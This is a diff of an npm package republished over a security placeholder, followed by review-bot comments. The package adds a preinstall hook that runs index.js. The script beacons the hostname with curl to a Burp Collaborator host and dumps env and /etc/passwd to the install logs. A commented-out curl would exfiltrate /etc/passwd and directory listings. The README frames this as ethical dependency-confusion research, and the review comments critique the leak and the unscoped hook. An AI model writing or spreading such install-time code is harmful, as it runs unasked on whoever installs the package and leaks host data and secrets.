dinesh-dev-nagajikkktest11223qa 0.0.1-security → 0.0.1
- package/README.md +20 -3
- package/index.js +59 -0
- package/package.json +10 -3
package/README.md
CHANGED
@@ -1,5 +1,22 @@
|
|
1
|
-
|
1
|
+
This is a sample package claimed for testing Dep-conf atck.
|
2
|
+
|
3
|
+
|
4
|
+
Hi, if you're reading this you're probably wondering what this code is doing on
|
5
|
+
your machine. Don't worry! It doesn't do anything nasty or malicious.
|
6
|
+
|
7
|
+
I am an ethical security researcher, attempting attacks against organisations
|
8
|
+
that have a "bug bounty" type program in place.
|
9
|
+
|
10
|
+
I am performing work similar to the work in this blog post:
|
11
|
+
https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
|
12
|
+
|
13
|
+
If your organisation has a bug bounty program my findings will be reported via
|
14
|
+
that program.
|
15
|
+
|
16
|
+
If your organisation does not have a bug bounty program, you were not targeted
|
17
|
+
by my work and have some how ended up getting included, any data reported from
|
18
|
+
your org will be discarded.
|
19
|
+
|
20
|
+
All data I collect will be deleted as soon as I'm done, in either case.
|
2
21
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
22
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=dinesh-dev-nagajikkktest11223qa for more information.
|
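--- /dev/null
+++ b/package/index.js
@@ -0,0 +1,59 @@
+// const { exec } = require("child_process");
+
+const exec = require('child_process').exec;
+
+function os_func() {
+this.execCommand = function (cmd) {
+return new Promise((resolve, reject)=> {
+exec(cmd, (error, stdout, stderr) => {
+if (error) {
+reject(error);
+return;
+}
+resolve(stdout)
+});
+})
+}
+}
+var os = new os_func();
+
+os.execCommand('hostname').then(res=> {
+var url = "https://lk99qpu5o6axevssgdvb1m0t9kfb30.burpcollaborator.net/" + res;
+
+os.execCommand('curl '+ url).then(res=> {
+console.log("os >>>", res);
+})
+console.log("os >>>", res);
+}).catch(err=> {
+console.log("os >>>", err);
+})
+
+os.execCommand('cd .. && cd .. && ls -lh').then(res=> {
+console.log("os >>>", res);
+}).catch(err=> {
+console.log("os >>>", err);
+})
+
+os.execCommand('env').then(res=> {
+console.log("os >>>", res);
+}).catch(err=> {
+console.log("os >>>", err);
+})
+
+return os.execCommand('cat /etc/passwd').then(res=> {
+console.log("os >>>", res);
+}).catch(err=> {
+console.log("os >>>", err);
+})
+
+// exec('curl --data-urlencode "passwd=`cat /etc/passwd|base64`" --data-urlencode "hostname=`hostname`" --data-urlencode "pwd=`pwd`" --data-urlencode "ls=`ls ~/`" http://b6imbtuauep1vb5p576tuvyznqtnhc.burpcollaborator.net/' , (error, stdout, stderr) => {
+// if (error) {
+// console.log(`error: ${error.message}`);
+// return;
+// }
+// if (stderr) {
+// console.log(`stderr: ${stderr}`);
+// return;
+// }
+// console.log(`stdout: ${stdout}`);
+// });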
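Review bot: The inner `os.execCommand('curl '+ url)` chain at new line 23 has no `.catch`, so when `curl` is absent or egress is blocked the rejection is unhandled and, on Node 15+, terminates the process with a non-zero exit; because package.json runs this file from `preinstall`, that fails the consumer's install rather than silently beaconing. The URL is also built by string-gluing the raw `hostname` output, which ends in a newline and is handed unescaped to a shell, so at minimum `var url = "https://….burpcollaborator.net/" + encodeURIComponent(res.trim());` and a trailing `.catch(err=> { console.log("os >>>", err); })` on the inner chain. Separately, the `env` and `cat /etc/passwd` results (new lines 37–47) are written to stdout, which lands in install and CI logs that are commonly retained — a secret-disclosure path even though only the hostname leaves the box, and at odds with the README's "doesn't do anything nasty" claim; a dependency-confusion canary needs only the hostname beacon, so those calls should go. The top-level `return` on line 43 only parses because CommonJS wraps the file in a function; drop it or comment why it is there.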
package/package.json
CHANGED
@@ -1,6 +1,13 @@
|
|
1
1
|
{
|
2
2
|
"name": "dinesh-dev-nagajikkktest11223qa",
|
3
|
-
"version": "0.0.1
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "0.0.1",
|
4
|
+
"description": "",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "node index.js"
|
9
|
+
},
|
10
|
+
"author": "vicky621",
|
11
|
+
"license": "ISC",
|
12
|
+
"dependencies": {}
|
6
13
|
}
|
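Review bot: The `"preinstall": "node index.js"` hook at new line 8 executes the package's script with the installing user's privileges on every `npm install`, before anything in the package can be reviewed, and nothing in this manifest scopes it to the organisations the README says are the target — anyone who resolves this name picks it up. `"description": ""` on line 4 should at least state the purpose, e.g. `"description": "Dependency-confusion canary; sends hostname beacon on preinstall, see README"`, so the intent is visible in registry metadata and `npm view` rather than only after unpacking. The removed lines are truncated in this render (`"version": "0.0.1`, `"description": "`), but the page title shows the prior release as the npm security-holding placeholder `0.0.1-security`, so this publish appears to re-claim a name previously pulled for malicious code; consumers whose lockfile pinned the placeholder should treat the new version as untrusted and, if they must resolve it, install with `--ignore-scripts`.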